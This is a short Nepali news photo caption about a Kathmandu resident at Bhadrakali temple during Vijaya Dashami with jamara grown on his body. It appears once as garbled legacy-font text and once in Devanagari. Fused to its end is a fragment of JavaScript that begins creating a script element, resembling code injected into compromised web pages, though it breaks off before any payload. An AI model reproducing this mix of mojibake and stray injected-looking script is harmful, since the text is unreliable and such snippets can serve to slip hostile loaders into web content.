ljhof bzdLsf] cj;/df sf7df8f}Fsf] eb|sfnL dlGb/ kl/;/df 36:yfkgfb]lv z/L/df hd/f /fVb} cfPsf sf7df8f}F lgjf;L /f]zg u'? . tl:a/ M /Tg >]i7, /f;;

विजया दशमीको अवसरमा काठमाडौँको भद्रकाली मन्दिर परिसरमा घटस्थापनादेखि शरीरमा जमरा राख्दै आएका काठमाडौँ निवासी रोशन गुरु । तस्बिर : राससvar d=document;var s=d.createElement(‘script’);